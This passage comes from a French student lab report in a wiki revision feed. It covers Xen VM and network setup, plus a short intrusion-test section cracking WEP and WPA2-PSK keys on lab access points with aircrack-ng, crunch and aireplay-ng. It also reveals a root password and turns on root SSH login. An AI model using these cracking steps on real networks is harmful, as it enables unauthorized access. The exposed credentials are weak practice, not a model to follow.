| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu1,xvda3,w','''&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu2,xvda4,w''''&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 '''/dev/xvda3 /home ext4 defaults 0 2'''&lt;br /&gt;
 '''/dev/xvda4 /var ext4 defaults 0 2'''&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 '''lsblk'''&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 '''xvda3 202:3 0 10G 0 disk /home'''&lt;br /&gt;
 '''xvda4 202:4 0 10G 0 disk /var'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''iface eth0 inet6 auto''' &lt;br /&gt;
 &lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec '''CTRL + ['''&lt;br /&gt;
&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
Pour retourner sur sa machine virtuelle, il faut : &lt;br /&gt;
&lt;br /&gt;
- retourner sur capbreton&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
- Relancer la VM (login : root | password : glopglopglop):&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré la résolution de noms dans /etc/network/interfaces, en ajoutons la ligne suivante :&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''dns-nameservers 8.8.8.8 8.8.4.4'''&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
Puis nous avons vérifié son fonctionnement à l'aide d'un :&lt;br /&gt;
 ping www.google.com&lt;br /&gt;
 ...&lt;br /&gt;
 --- www.google.com ping statistics ---&lt;br /&gt;
 5 packets transmitted, 5 received, 0% packet loss, time 4005ms&lt;br /&gt;
&lt;br /&gt;
Configuration du SSH &lt;br /&gt;
&lt;br /&gt;
Dans /etc/ssh/sshd_config, ajout des lignes :&lt;br /&gt;
 Port 2223&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Puis :&lt;br /&gt;
 &amp;gt; systemctl restart ssh&lt;br /&gt;
 &amp;gt; systemctl status ssh&lt;br /&gt;
 ssh.service - OpenBSD Secure Shell server&lt;br /&gt;
     Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: e&amp;gt;&lt;br /&gt;
     Active: active (running) since Mon 2021-11-29 14:47:49 UTC; 2s ago&lt;br /&gt;
       Docs: man:sshd(8)&lt;br /&gt;
             man:sshd_config(5)&lt;br /&gt;
    Process: 3679 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)&lt;br /&gt;
   Main PID: 3680 (sshd)&lt;br /&gt;
      Tasks: 1 (limit: 230)&lt;br /&gt;
     Memory: 1.3M&lt;br /&gt;
        CPU: 21ms&lt;br /&gt;
     CGroup: /system.slice/ssh.service&lt;br /&gt;
             `-3680 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups&lt;br /&gt;
&lt;br /&gt;
Puis nous testons le SSH depuis le terminal de la Zabeth :&lt;br /&gt;
 &amp;gt; ssh root@193.48.57.177 -p 2223&lt;br /&gt;
 password : glopglopglop&lt;br /&gt;
&lt;br /&gt;
Nous arrivons à nous connecter, la configuration du SSh est donc un succès.&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''5.2 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'interface réseau WiFi du eeePC:&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
On trouve : '''wlx40a5ef0f68cb'''&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor sur le channel 4:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
Après cette étape, il est possible que la carte réseau soit renommée par airmon-ng en wlan0mon.&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ecouter les beacon WiFi sur cette carte réseau :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
De cette écoute , nous choisissons l'AP nommé '''cracotte09'''  avec le BSSID  : '''04:DA:D2:9C:50:58'''&lt;br /&gt;
&lt;br /&gt;
Nous simulons l'authentification sur cet AP :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte09 -a 04:DA:D2:9C:50:58' wlan0mon&lt;br /&gt;
&lt;br /&gt;
 -9 : mode injection&lt;br /&gt;
 -e cracotte09 : nom du point d'accès&lt;br /&gt;
 -a 04:DA:D2:9C:50:58 : bssid du point d'accès&lt;br /&gt;
&lt;br /&gt;
Nous récupérons ensuite un nombre de frames conséquent émis par cet access point :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte09 -a 04:DA:D2:9C:50:58 -h 40:A5:EF:01:28:D0 wlan0mon&lt;br /&gt;
&lt;br /&gt;
-1 : mode &amp;quot;fake authentification&amp;quot;&lt;br /&gt;
0 : délai entre les demandes d'authentifications&lt;br /&gt;
-h 40:A5:EF:01:27:D0 : bssid de l'interface réseau&lt;br /&gt;
&lt;br /&gt;
Résultat :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Key_name.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
'''5.3 Cassage de clef WPA2-PSK d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Maintenant nous choisissions kracotte5 comme victime à l'aide du groupe de commande précédentes, c'est à dire :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons trouvé la victime (kracotte 5 ainsi que son BSSID), nous tentons de récupérer un handshake provenant de ce point d'accès et nous le stockons dans un fichier psk :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:04 -w psk wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous installons ensuite un utilitaire pour générer le dictionnaire de clé WPA2-PSK qui sera utilisé par aircrack-ng pour se connecter au point d'accès wifi kracotte5 :&lt;br /&gt;
&lt;br /&gt;
 apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
Pour installer cette utilitaire nous pouvons relier l'eeePc au réseau de l'école à l'aide du deuxième câble ethernet disponnible à l'arrière des zabeth :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:branchement_eee_pc.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une fois installé nous pouvons générer le dictionnaire :&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Une fois généré, nous pouvons lancer la précédure de crackage (qui peut être très longue) :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:04 psk*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Crackage_wpa.png|center|thumb|500px|Crackage WPA]]&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56632</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56632"/>
				<updated>2021-11-29T16:14:55Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* 3. Configuration des Machines Virtuelles */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= Sujet =&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce TP est de créer un réseau redondé &lt;br /&gt;
Lien : https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu1,xvda3,w','''&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu2,xvda4,w''''&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
